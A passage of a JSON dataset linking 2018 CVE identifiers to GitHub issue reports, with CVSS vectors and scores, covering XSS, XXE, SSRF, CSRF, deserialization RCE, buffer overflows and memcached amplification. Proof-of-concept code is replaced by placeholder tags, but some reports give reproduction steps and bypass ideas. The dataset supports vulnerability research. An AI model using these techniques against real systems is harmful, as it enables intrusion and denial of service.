  16319. "Issue_Url_old": "https://github.com/bitpay/insight-api/issues/542",
  16320. "Issue_Url_new": "https://github.com/bitpay/insight-api/issues/542",
  16321. "Repo_new": "bitpay/insight-api",
  16322. "Issue_Created_At": "2018-01-12T01:23:21Z",
  16323. "description": "Security] Full Path Disclosure. Sending unexpected data to broadcast endpoint APITAG results in an error message which contains the path of the node app. APITAG Path Disclosure Vulnerability URLTAG Example Code: ERRORTAG examples NUMBERTAG Trezor.io ( FILETAG APITAG ERRORTAG NUMBERTAG blockdozer.com APITAG ERRORTAG It seems that all other deployments of insight have this vulnerability.",
  16324. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
  16325. "severity": "MEDIUM",
  16326. "baseScore": 5.3,
  16327. "impactScore": 1.4,
  16328. "exploitabilityScore": 3.9
  16329. },
  16330. {
  16331. "CVE_ID": "CVE-2018-1000047",
  16332. "Issue_Url_old": "https://github.com/nasa/Kodiak/issues/5",
  16333. "Issue_Url_new": "https://github.com/nasa/kodiak/issues/5",
  16334. "Repo_new": "nasa/kodiak",
  16335. "Issue_Created_At": "2016-12-01T00:03:54Z",
  16336. "description": "Remote code execution in Kodiak. Hi, Kodiak ERRORTAG I would like to report a potential remote code execution vulnerability in Singledop . Pickle module enables binary serialization and loading of Python datatypes and any user supplied sample file can lead to remote code execution on any researcher's machine processing a serialized file. APITAG Attack binary a valid dop file: ERRORTAG The pickle module is not intended to be secure against erroneous or maliciously constructed data. Never unpickle data received from an untrusted or unauthenticated source. Please let me know if you have any questions. You can also reach back to me at nitin. EMAILTAG rg Thanks",
  16337. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  16338. "severity": "HIGH",
  16339. "baseScore": 8.8,
  16340. "impactScore": 5.9,
  16341. "exploitabilityScore": 2.8
  16342. },
  16343. {
  16344. "CVE_ID": "CVE-2018-1000048",
  16345. "Issue_Url_old": "https://github.com/nasa/RtRetrievalFramework/issues/1",
  16346. "Issue_Url_new": "https://github.com/nasa/rtretrievalframework/issues/1",
  16347. "Repo_new": "nasa/rtretrievalframework",
  16348. "Issue_Created_At": "2016-11-30T23:59:46Z",
  16349. "description": "Remote code execution APITAG Hi, APITAG CODETAG I would like to report a potential remote code execution vulnerability in Singledop . Pickle module enables binary serialization and loading of Python datatypes and any user supplied sample file can lead to remote code execution on any researcher's machine processing a serialized file. APITAG Attack binary a valid dop file: ERRORTAG The pickle module is not intended to be secure against erroneous or maliciously constructed data. Never unpickle data received from an untrusted or unauthenticated source. Please let me know if you have any questions. You can also reach back to me at nitin. EMAILTAG rg Thanks",
  16350. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  16351. "severity": "HIGH",
  16352. "baseScore": 8.8,
  16353. "impactScore": 5.9,
  16354. "exploitabilityScore": 2.8
  16355. },
  16356. {
  16357. "CVE_ID": "CVE-2018-1000052",
  16358. "Issue_Url_old": "https://github.com/fmtlib/fmt/issues/642",
  16359. "Issue_Url_new": "https://github.com/fmtlib/fmt/issues/642",
  16360. "Repo_new": "fmtlib/fmt",
  16361. "Issue_Created_At": "2018-02-01T16:37:50Z",
  16362. "description": "Segmentation fault in APITAG (memory corruption, invalid write of size NUMBERTAG Dear fmtlib team \u2014 I have detected a segmentation fault in APITAG function using an invalid format specifier. Version APITAG How to reproduce NUMBERTAG Use the following sample program APITAG ERRORTAG NUMBERTAG Compile bug.cc APITAG NUMBERTAG Execute APITAG gdb CODETAG valgrind ERRORTAG Expected behaviour Throw ERRORTAG exception I found the issue with AFL. Cheers Stephan Zeisberg",
  16363. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  16364. "severity": "HIGH",
  16365. "baseScore": 7.5,
  16366. "impactScore": 3.6,
  16367. "exploitabilityScore": 3.9
  16368. },
  16369. {
  16370. "CVE_ID": "CVE-2018-1000059",
  16371. "Issue_Url_old": "https://github.com/validformbuilder/validformbuilder/issues/126",
  16372. "Issue_Url_new": "https://github.com/validformbuilder/validformbuilder/issues/126",
  16373. "Repo_new": "validformbuilder/validformbuilder",
  16374. "Issue_Created_At": "2018-02-03T23:36:00Z",
  16375. "description": "PHP Object Injection Security Issue. Expected behavior When some form data provided by the web application client for unserialize, PHP Object serialization should only be valid for APITAG objects (or whatever they should be) Actual behavior User can enter any PHP Object. This can lead to vulnerabilities like remote code execution and local file inclusion. URLTAG This method requires an object to be provided with base NUMBERTAG encoding and gunzip. If we input a serialised PHP object with gunzipped and then base NUMBERTAG encoded, the vulnerability will trigger. I am yet to sift through all the code in the project to find an appropriate class to leverage. Which version/branch of APITAG Builder do you use? I use version/branch NUMBERTAG",
  16376. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  16377. "severity": "CRITICAL",
  16378. "baseScore": 9.8,
  16379. "impactScore": 5.9,
  16380. "exploitabilityScore": 3.9
  16381. },
  16382. {
  16383. "CVE_ID": "CVE-2018-1000060",
  16384. "Issue_Url_old": "https://github.com/sensu/sensu/issues/1804",
  16385. "Issue_Url_new": "https://github.com/sensu/sensu/issues/1804",
  16386. "Repo_new": "sensu/sensu",
  16387. "Issue_Created_At": "2018-01-20T11:11:34Z",
  16388. "description": "Visible password at sensu client logs after restart. Configuring single rabbitmq, sensu is able to redact the password in client logs after restart. But when configuring multiple rabbitmqs, plain text password is visible. Logs for single rabbitmq config : CODETAG Logs for multiple rabbitmq config : CODETAG This issue seems to occur because multiple rabbitmq config is stored in a nested array format. Sensu is not able to look up the password keyword inside the hash, inside the array and hence, not able to redact the password in logs.",
  16389. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  16390. "severity": "CRITICAL",
  16391. "baseScore": 9.8,
  16392. "impactScore": 5.9,
  16393. "exploitabilityScore": 3.9
  16394. },
  16395. {
  16396. "CVE_ID": "CVE-2018-1000062",
  16397. "Issue_Url_old": "https://github.com/robiso/wondercms/issues/56",
  16398. "Issue_Url_new": "https://github.com/wondercms/wondercms/issues/56",
  16399. "Repo_new": "wondercms/wondercms",
  16400. "Issue_Created_At": "2018-02-08T10:26:37Z",
  16401. "description": "Stored Cross Site Scripting On File Upload . Hi Team, I have found stored Cross Site scripting on APITAG NUMBERTAG In FILETAG there is a function APITAG It does not sanitize svg file and it is possible to execute a Cross Site Scripting XSS attacks. Already sent email to EMAILTAG , and work with all modern browser. hope you can fix it asap. FILETAG When you fix the bug, please, can you include my name in the release notes when the bug will be corrected? Tanmay EMAILTAG",
  16402. "vectorString": "CVSS:3.0/AV:N/AC:H/PR:L/UI:R/S:C/C:L/I:L/A:N",
  16403. "severity": "MEDIUM",
  16404. "baseScore": 4.4,
  16405. "impactScore": 2.7,
  16406. "exploitabilityScore": 1.3
  16407. },
  16408. {
  16409. "CVE_ID": "CVE-2018-1000071",
  16410. "Issue_Url_old": "https://github.com/roundcube/roundcubemail/issues/6173",
  16411. "Issue_Url_new": "https://github.com/roundcube/roundcubemail/issues/6173",
  16412. "Repo_new": "roundcube/roundcubemail",
  16413. "Issue_Created_At": "2018-02-12T12:26:39Z",
  16414. "description": "Permissions Issue with enigma plugin?. See my reference here. FILETAG",
  16415. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  16416. "severity": "HIGH",
  16417. "baseScore": 7.5,
  16418. "impactScore": 3.6,
  16419. "exploitabilityScore": 3.9
  16420. },
  16421. {
  16422. "CVE_ID": "CVE-2018-1000084",
  16423. "Issue_Url_old": "https://github.com/wolfcms/wolfcms/issues/667",
  16424. "Issue_Url_new": "https://github.com/wolfcms/wolfcms/issues/667",
  16425. "Repo_new": "wolfcms/wolfcms",
  16426. "Issue_Created_At": "2018-02-11T19:05:31Z",
  16427. "description": "Stored Cross Site Scripting Vulnerability APITAG Bug). Hi Team, I have found stored cross site scripting on APITAG NUMBERTAG Stable Version APITAG Bug) with privilege escalation. scenario APITAG to reproduce) Step NUMBERTAG Logged In as a Developer Role Step NUMBERTAG From Layout Tab edit the file Layout file name with APITAG APITAG Step NUMBERTAG It will store the name as javascript code and it will execute cross site scripting Step NUMBERTAG Logged in as an Admin and it will automatically execute the cross site scripting which were stored in Developers role layout. Step NUMBERTAG From Admin Role goto Layout Tab it will execute the cross site scripting. Vulnerable field is from APITAG tab APITAG Name\" APITAG find attached screenshot) FILETAG Developer stored javascript code which will execute on Admin page (screenshot) FILETAG Admin Page Cross Site scripting executed in screenshot It does not sanitize APITAG Name\" from APITAG Tab and it is possible to execute a Stored Cross Site Scripting XSS attacks from Developer role to Admin role Additional information Wolf CMS version NUMBERTAG DB type and version: APITAG NUMBERTAG APITAG HTTP server type and version: APITAG When you fix the bug, please, can you include my name in the release notes when the bug will be corrected? Tanmay EMAILTAG",
  16428. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  16429. "severity": "MEDIUM",
  16430. "baseScore": 5.4,
  16431. "impactScore": 2.7,
  16432. "exploitabilityScore": 2.3
  16433. },
  16434. {
  16435. "CVE_ID": "CVE-2018-1000086",
  16436. "Issue_Url_old": "https://github.com/nprapps/pym.js/issues/170",
  16437. "Issue_Url_new": "https://github.com/nprapps/pym.js/issues/170",
  16438. "Repo_new": "nprapps/pym.js",
  16439. "Issue_Created_At": "2018-02-13T19:28:00Z",
  16440. "description": "Sanitize url.",
  16441. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  16442. "severity": "HIGH",
  16443. "baseScore": 8.8,
  16444. "impactScore": 5.9,
  16445. "exploitabilityScore": 2.8
  16446. },
  16447. {
  16448. "CVE_ID": "CVE-2018-1000087",
  16449. "Issue_Url_old": "https://github.com/wolfcms/wolfcms/issues/666",
  16450. "Issue_Url_new": "https://github.com/wolfcms/wolfcms/issues/666",
  16451. "Repo_new": "wolfcms/wolfcms",
  16452. "Issue_Created_At": "2018-02-11T18:40:07Z",
  16453. "description": "Reflected Cross Site Scripting NUMBERTAG Hi Team, I have found Reflected Cross Site Scripting on APITAG NUMBERTAG Stable Version Vulnerable parameter is APITAG New File\" and APITAG New Directory\" It does not sanitize APITAG New File\" and APITAG New Directory\" input box from 'files' Tab and it is possible to execute a Cross Site Scripting XSS attacks. Please find the attached screenshot for proof of concept FILETAG Additional information Wolf CMS version NUMBERTAG DB type and version: APITAG NUMBERTAG APITAG HTTP server type and version: APITAG When you fix the bug, please, can you include my name in the release notes when the bug will be corrected? Tanmay EMAILTAG",
  16454. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
  16455. "severity": "MEDIUM",
  16456. "baseScore": 4.8,
  16457. "impactScore": 2.7,
  16458. "exploitabilityScore": 1.7
  16459. },
  16460. {
  16461. "CVE_ID": "CVE-2018-1000088",
  16462. "Issue_Url_old": "https://github.com/doorkeeper-gem/doorkeeper/issues/969",
  16463. "Issue_Url_new": "https://github.com/doorkeeper-gem/doorkeeper/issues/969",
  16464. "Repo_new": "doorkeeper-gem/doorkeeper",
  16465. "Issue_Created_At": "2017-05-25T21:14:32Z",
  16466. "description": "XSS in default authorization page. Default authorization page uses the \"raw\" function which inevitably leads to an XSS issue : URLTAG I will follow with a merge request",
  16467. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  16468. "severity": "MEDIUM",
  16469. "baseScore": 6.1,
  16470. "impactScore": 2.7,
  16471. "exploitabilityScore": 2.8
  16472. },
  16473. {
  16474. "CVE_ID": "CVE-2018-1000090",
  16475. "Issue_Url_old": "https://github.com/textpattern/textpattern/issues/1141",
  16476. "Issue_Url_new": "https://github.com/textpattern/textpattern/issues/1141",
  16477. "Repo_new": "textpattern/textpattern",
  16478. "Issue_Created_At": "2018-02-04T01:01:27Z",
  16479. "description": "XML Injection Denial of Service. Expected behaviour Validate XML import against a schema Actual behaviour Processes the XML bomb provided Steps to reproduce Import an XML file with the following content: CODETAG This shows how we can make the server consume memory when parsing the XML. This can be done to eventually exhaust the entire server's memory (depending on configuration) and create a denial of service scenario. The lines of code vulnerable are given below: URLTAG If schema validation is added to the method, the issue should be resolved. This will also require ensuring entities are not within the XML file too.",
  16480. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  16481. "severity": "HIGH",
  16482. "baseScore": 7.5,
  16483. "impactScore": 3.6,
  16484. "exploitabilityScore": 3.9
  16485. },
  16486. {
  16487. "CVE_ID": "CVE-2018-1000091",
  16488. "Issue_Url_old": "https://github.com/mwarning/KadNode/issues/79",
  16489. "Issue_Url_new": "https://github.com/mwarning/kadnode/issues/79",
  16490. "Repo_new": "mwarning/kadnode",
  16491. "Issue_Created_At": "2018-02-15T08:21:47Z",
  16492. "description": "Buffer Overflow Vulnerability in ext cmd.c. The Issue A user can overflow the buffer for APITAG and can control EIP using this. This implies the user can control the execution flow of the program. Proof of Concept Run the following command: APITAG This will trigger a SIGSEGV and provide the output APITAG FILETAG The line where this issue occurs is as follows: URLTAG",
  16493. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
  16494. "severity": "HIGH",
  16495. "baseScore": 8.8,
  16496. "impactScore": 5.9,
  16497. "exploitabilityScore": 2.8
  16498. },
  16499. {
  16500. "CVE_ID": "CVE-2018-1000093",
  16501. "Issue_Url_old": "https://github.com/cryptonotefoundation/cryptonote/issues/172",
  16502. "Issue_Url_new": "https://github.com/cryptonotefoundation/cryptonote/issues/172",
  16503. "Repo_new": "cryptonotefoundation/cryptonote",
  16504. "Issue_Created_At": "2018-02-05T08:10:40Z",
  16505. "description": "Vulnerability report. Hi, I found a vulnerability in APITAG Please send me an email at terrycwk NUMBERTAG at] APITAG as well as respond to this issue so that I know the email is from a legitimate developer.",
  16506. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  16507. "severity": "HIGH",
  16508. "baseScore": 8.8,
  16509. "impactScore": 5.9,
  16510. "exploitabilityScore": 2.8
  16511. },
  16512. {
  16513. "CVE_ID": "CVE-2018-1000093",
  16514. "Issue_Url_old": "https://github.com/amjuarez/bytecoin/issues/217",
  16515. "Issue_Url_new": "https://github.com/amjuarez/bytecoin/issues/217",
  16516. "Repo_new": "amjuarez/bytecoin",
  16517. "Issue_Created_At": "2018-02-05T08:10:38Z",
  16518. "description": "Vulnerability report. Hi, I found a vulnerability in Bytecoin. Please send me an email at terrycwk NUMBERTAG at] APITAG as well as respond to this issue so that I know the email is from a legitimate developer.",
  16519. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  16520. "severity": "HIGH",
  16521. "baseScore": 8.8,
  16522. "impactScore": 5.9,
  16523. "exploitabilityScore": 2.8
  16524. },
  16525. {
  16526. "CVE_ID": "CVE-2018-1000100",
  16527. "Issue_Url_old": "https://github.com/gpac/gpac/issues/994",
  16528. "Issue_Url_new": "https://github.com/gpac/gpac/issues/994",
  16529. "Repo_new": "gpac/gpac",
  16530. "Issue_Created_At": "2018-02-22T07:51:17Z",
  16531. "description": "Out of bounds heap write . Thanks for reporting your issue. Please make sure these boxes are checked before submitting your issue thank you! [x] I looked for a similar issue and couldn't find any. [x] I tried with the latest version of GPAC. Installers available at URLTAG [x] I give enough information for contributors to reproduce my issue (meaningful title, github labels, platform and compiler, command line ...). I can share files anonymously with this dropbox: URLTAG Detailed guidelines: URLTAG There is an out of bounds heap write in av_ext.c: URLTAG APITAG is read from user input, and then used in the condition of the for loop. This means the user can force the loop to execute up to NUMBERTAG times. The APITAG array only has NUMBERTAG elements, and this array is allocated on the heap, so I can craft a file that causes this file to write out of the bounds of the array onto the heap. For example, an attacker could overwrite the top chunk of the glibc heap, which can be used with other bugs to achieve remote code execution in services processing user supplied media files.",
  16532. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  16533. "severity": "HIGH",
  16534. "baseScore": 7.8,
  16535. "impactScore": 5.9,
  16536. "exploitabilityScore": 1.8
  16537. },
  16538. {
  16539. "CVE_ID": "CVE-2018-1000115",
  16540. "Issue_Url_old": "https://github.com/memcached/memcached/issues/348",
  16541. "Issue_Url_new": "https://github.com/memcached/memcached/issues/348",
  16542. "Repo_new": "memcached/memcached",
  16543. "Issue_Created_At": "2018-02-27T23:57:02Z",
  16544. "description": "UDP Amplification Attacks, result of Memcached UDP port NUMBERTAG URLTAG The above commit has resulted in the ability to spoof a victim address to public memcache servers around the world, resulting in a massive amount of data returned from the memcache service. Simple example: FILETAG These attacks appear to be ranging anywhere from APITAG to over APITAG This has been confirmed on the backlines by many providers, as well as publicly by Cloudflare, and Rapid7. URLTAG URLTAG",
  16545. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  16546. "severity": "HIGH",
  16547. "baseScore": 7.5,
  16548. "impactScore": 3.6,
  16549. "exploitabilityScore": 3.9
  16550. },
  16551. {
  16552. "CVE_ID": "CVE-2018-1000124",
  16553. "Issue_Url_old": "https://github.com/mkucej/i-librarian/issues/116",
  16554. "Issue_Url_new": "https://github.com/mkucej/i-librarian/issues/116",
  16555. "Repo_new": "mkucej/i-librarian",
  16556. "Issue_Created_At": "2018-03-02T14:54:34Z",
  16557. "description": "XXE vulnerability. URLTAG URLTAG APITAG passes into APITAG , APITAG passes into APITAG This creates a Blind XXE URLTAG vulnerability. By XXE, an attacker can read the contents of a file on the target host and attack other hosts on the intranet(SSRF). POC: CODETAG APITAG",
  16558. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H",
  16559. "severity": "CRITICAL",
  16560. "baseScore": 10.0,
  16561. "impactScore": 6.0,
  16562. "exploitabilityScore": 3.9
  16563. },
  16564. {
  16565. "CVE_ID": "CVE-2018-1000125",
  16566. "Issue_Url_old": "https://github.com/inversoft/prime-jwt/issues/2",
  16567. "Issue_Url_new": "https://github.com/fusionauth/fusionauth-jwt/issues/2",
  16568. "Repo_new": "fusionauth/fusionauth-jwt",
  16569. "Issue_Created_At": "2018-01-30T10:17:47Z",
  16570. "description": "The library does not check the situation if signature algorithm is defined but no signature is provided. Please doublecheck this is a valid issue. According to FILETAG \"alg\" Header Parameter MUST be present and MUST be understood and processed by implementations. In my opinion that means that if \"alg\" is not \"none\", then signature must be present and verified. Attached FILETAG demonstrates the problem.",
  16571. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  16572. "severity": "CRITICAL",
  16573. "baseScore": 9.8,
  16574. "impactScore": 5.9,
  16575. "exploitabilityScore": 3.9
  16576. },
  16577. {
  16578. "CVE_ID": "CVE-2018-1000127",
  16579. "Issue_Url_old": "https://github.com/memcached/memcached/issues/271",
  16580. "Issue_Url_new": "https://github.com/memcached/memcached/issues/271",
  16581. "Repo_new": "memcached/memcached",
  16582. "Issue_Created_At": "2017-04-28T01:54:33Z",
  16583. "description": "Memcached gets a dead loop in func assoc_find. OS Ver: APITAG NUMBERTAG Kernel Ver NUMBERTAG APITAG Memcached Ver NUMBERTAG and NUMBERTAG gdb info: (gdb) info thread NUMBERTAG Thread NUMBERTAG f NUMBERTAG e NUMBERTAG LWP NUMBERTAG logger_thread (arg=<value optimized out>) at APITAG NUMBERTAG Thread NUMBERTAG f NUMBERTAG d NUMBERTAG LWP NUMBERTAG assoc_find (key=<value optimized out>, nkey=<value optimized out>, hv=<value optimized out>) at APITAG NUMBERTAG Thread NUMBERTAG f NUMBERTAG cf NUMBERTAG LWP NUMBERTAG f NUMBERTAG e NUMBERTAG a NUMBERTAG in __lll_lock_wait () from APITAG NUMBERTAG Thread NUMBERTAG f NUMBERTAG LWP NUMBERTAG f NUMBERTAG e NUMBERTAG a NUMBERTAG in __lll_lock_wait () from APITAG NUMBERTAG Thread NUMBERTAG f NUMBERTAG fff NUMBERTAG LWP NUMBERTAG f NUMBERTAG e NUMBERTAG a NUMBERTAG in __lll_lock_wait () from APITAG NUMBERTAG Thread NUMBERTAG f NUMBERTAG fe NUMBERTAG LWP NUMBERTAG f NUMBERTAG e NUMBERTAG c in APITAG () from APITAG NUMBERTAG Thread NUMBERTAG f NUMBERTAG f1aa NUMBERTAG LWP NUMBERTAG f NUMBERTAG e NUMBERTAG f NUMBERTAG in epoll_wait () from APITAG In the thread NUMBERTAG assoc_find): dead loop in: (gdb) n NUMBERTAG while (it) { (gdb NUMBERTAG if ((nkey == it >nkey) && (memcmp(key, ITEM_key(it), nkey NUMBERTAG gdb NUMBERTAG it = it >h_next; items info: (gdb) p it NUMBERTAG item NUMBERTAG f NUMBERTAG a4fd7a0 (gdb) p it NUMBERTAG next NUMBERTAG f NUMBERTAG a4fd7a0, pre NUMBERTAG f0ffaeee NUMBERTAG h_next NUMBERTAG f NUMBERTAG a4fd7a0, time NUMBERTAG exptime NUMBERTAG nbytes NUMBERTAG refcount NUMBERTAG nsuffi NUMBERTAG n', it_flags NUMBERTAG slabs_clsid NUMBERTAG nkey NUMBERTAG data NUMBERTAG f NUMBERTAG a4fd7a0} it >h_next == it self, so the deap loop coming.. So this is a bug ?",
  16584. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  16585. "severity": "HIGH",
  16586. "baseScore": 7.5,
  16587. "impactScore": 3.6,
  16588. "exploitabilityScore": 3.9
  16589. },
  16590. {
  16591. "CVE_ID": "CVE-2018-1000133",
  16592. "Issue_Url_old": "https://github.com/tridentli/pitchfork/issues/168",
  16593. "Issue_Url_new": "https://github.com/tridentli/pitchfork/issues/168",
  16594. "Repo_new": "tridentli/pitchfork",
  16595. "Issue_Created_At": "2018-03-07T03:44:31Z",
  16596. "description": "Resolve Perms issue for Thomas. There's an issue with the way perms are mapped, see bapril for details.",
  16597. "vectorString": "CVSS:3.0/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H",
  16598. "severity": "HIGH",
  16599. "baseScore": 7.5,
  16600. "impactScore": 5.9,
  16601. "exploitabilityScore": 1.6
  16602. },
  16603. {
  16604. "CVE_ID": "CVE-2018-1000134",
  16605. "Issue_Url_old": "https://github.com/pingidentity/ldapsdk/issues/40",
  16606. "Issue_Url_new": "https://github.com/pingidentity/ldapsdk/issues/40",
  16607. "Repo_new": "pingidentity/ldapsdk",
  16608. "Issue_Created_At": "2018-03-09T14:04:27Z",
  16609. "description": "APITAG in APITAG allows empty password with set APITAG Hey folks, Is there a reason why check for empty password when APITAG is set comes after logic for doing processing in synchronous mode? URLTAG ERRORTAG At the moment that check only applies to async mode and leaves synchronous mode open to the old and nasty behaviour. Could that entire block be moved up to cover both sync and async methods?",
  16610. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  16611. "severity": "CRITICAL",
  16612. "baseScore": 9.8,
  16613. "impactScore": 5.9,
  16614. "exploitabilityScore": 3.9
  16615. },
  16616. {
  16617. "CVE_ID": "CVE-2018-1000137",
  16618. "Issue_Url_old": "https://github.com/mkucej/i-librarian/issues/121",
  16619. "Issue_Url_new": "https://github.com/mkucej/i-librarian/issues/121",
  16620. "Repo_new": "mkucej/i-librarian",
  16621. "Issue_Created_At": "2018-03-15T12:39:42Z",
  16622. "description": "CSRF to force new password for administrator. URLTAG CSRF URLTAG vulnerability is present here, It will allow an attacker to force updates the password of the admin whose id is NUMBERTAG POC: CODETAG",
  16623. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  16624. "severity": "HIGH",
  16625. "baseScore": 8.8,
  16626. "impactScore": 5.9,
  16627. "exploitabilityScore": 2.8
  16628. },
  16629. {
  16630. "CVE_ID": "CVE-2018-1000138",
  16631. "Issue_Url_old": "https://github.com/mkucej/i-librarian/issues/120",
  16632. "Issue_Url_new": "https://github.com/mkucej/i-librarian/issues/120",
  16633. "Repo_new": "mkucej/i-librarian",
  16634. "Issue_Created_At": "2018-03-15T10:01:18Z",
  16635. "description": "SSRF vulnerability. URLTAG The filter can be bypassed by wildcard DNS. e.g. xip.io POC: CODETAG APITAG",
  16636. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N",
  16637. "severity": "CRITICAL",
  16638. "baseScore": 9.1,
  16639. "impactScore": 5.2,
  16640. "exploitabilityScore": 3.9
  16641. },
  16642. {
  16643. "CVE_ID": "CVE-2018-1000139",
  16644. "Issue_Url_old": "https://github.com/mkucej/i-librarian/issues/119",
  16645. "Issue_Url_new": "https://github.com/mkucej/i-librarian/issues/119",
  16646. "Repo_new": "mkucej/i-librarian",
  16647. "Issue_Created_At": "2018-03-15T09:38:05Z",
  16648. "description": "Reflected XSS vulnerability. URLTAG When APITAG at ilibrarian APITAG could cause a reflective XSS. POC: URLTAG APITAG APITAG",
  16649. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  16650. "severity": "MEDIUM",
  16651. "baseScore": 6.1,
  16652. "impactScore": 2.7,
  16653. "exploitabilityScore": 2.8
  16654. },
  16655. {
  16656. "CVE_ID": "CVE-2018-1000141",
  16657. "Issue_Url_old": "https://github.com/mkucej/i-librarian/issues/124",
  16658. "Issue_Url_new": "https://github.com/mkucej/i-librarian/issues/124",
  16659. "Repo_new": "mkucej/i-librarian",
  16660. "Issue_Created_At": "2018-03-23T05:52:03Z",
  16661. "description": "Unauthorized read, post and delete messages in arbitrary projects. For example, if user1 creates a project and invites some users into this project. User2 is not in this project. If user2 visits APITAG directly, he gets ERRORTAG You are not authorized to see this project.\" But if user2 visits APITAG , he is able to read the messages for this project. Similarly user2 can use APITAG to delete all messages, and APITAG to post new messages. The bug is in FILETAG . Unlike FILETAG , FILETAG doesn't check if the current user is in the specified project.",
  16662. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N",
  16663. "severity": "CRITICAL",
  16664. "baseScore": 9.1,
  16665. "impactScore": 5.2,
  16666. "exploitabilityScore": 3.9
  16667. },
  16668. {
  16669. "CVE_ID": "CVE-2018-1000154",
  16670. "Issue_Url_old": "https://github.com/zammad/zammad/issues/1869",
  16671. "Issue_Url_new": "https://github.com/zammad/zammad/issues/1869",
  16672. "Repo_new": "zammad/zammad",
  16673. "Issue_Created_At": "2018-03-12T07:01:16Z",
  16674. "description": "XSS issue placeholder. Infos: Used Zammad version NUMBERTAG and higher Installation method (source, package, ..): any Operating system: any Database + version: any Elasticsearch version: any Browser + version: any MENTIONTAG ( URLTAG reported an XSS issue. The content of this issue will be public after the issue is solved. Expected behavior: placeholder The content will be public after the issue is solved. Actual behavior: placeholder The content will be public after the issue is solved. Steps to reproduce the behavior: placeholder The content will be public after the issue is solved.",
  16675. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  16676. "severity": "MEDIUM",
  16677. "baseScore": 6.1,
  16678. "impactScore": 2.7,
  16679. "exploitabilityScore": 2.8
  16680. },
  16681. {
  16682. "CVE_ID": "CVE-2018-1000160",
  16683. "Issue_Url_old": "https://github.com/RisingStack/protect/issues/16",
  16684. "Issue_Url_new": "https://github.com/risingstack/protect/issues/16",
  16685. "Repo_new": "risingstack/protect",
  16686. "Issue_Created_At": "2018-03-26T23:43:53Z",
  16687. "description": "Vulnerable to XSS attacks. tl;dr Don't use regexes for sanitization of HTML but if you are, then at least strip out all tags with something like: APITAG But with even this, I'd imagine a carefully constructed XSS vector could get around it I'd advise: Escaping the characters using HTML entities e.g. ERRORTAG Using a node's text APITAG isn't an option for server side code) e.g. ERRORTAG APITAG As discussed in many posts e.g. URLTAG URLTAG Regular expressions are not a valid approach when dealing with a more complicated language (especially when browsers support _dirty_ HTML) For example, here are NUMBERTAG alid XSS attack vectors that are all reported as false Attack Vectors ERRORTAG These have been tested on the current function, the updated function to test for any tags, being escaped and being set using the text attribute. The results can be seen here: URLTAG I'm sure there are many other edge cases I haven't thought of yet or that haven't been developed by browsers yet. If you insist on using regex, here's a good list + just remove any tag FILETAG",
  16688. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  16689. "severity": "MEDIUM",
  16690. "baseScore": 6.1,
  16691. "impactScore": 2.7,
  16692. "exploitabilityScore": 2.8
  16693. },
  16694. {
  16695. "CVE_ID": "CVE-2018-1000162",
  16696. "Issue_Url_old": "https://github.com/Roave/SecurityAdvisories/issues/44",
  16697. "Issue_Url_new": "https://github.com/roave/securityadvisories/issues/44",
  16698. "Repo_new": "roave/securityadvisories",
  16699. "Issue_Created_At": "2018-02-26T17:52:30Z",
  16700. "description": "Parsedown status is questionable?. Parsedown is listed here as having a security advisory, but I'm not NUMBERTAG sure it is warranted. It is a Markdown parsing library that takes the Markdown input it is given and turns it into HTML. Period. That is all it does. It is not output sanitizer and the author has stated that that is not a goal of the library. It already is possible to combine Parsedown with a sanitizer in order to sanitize output, for example: CODETAG IMO, these two things are separate concerns and forcing Parsedown to implement a full HTML sanitization feature or integrate with other libraries to do so when it can easily be done flexibly and easily in user land doesn't make a ton of sense. Thoughts?",
  16701. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  16702. "severity": "MEDIUM",
  16703. "baseScore": 6.1,
  16704. "impactScore": 2.7,
  16705. "exploitabilityScore": 2.8
  16706. },
  16707. {
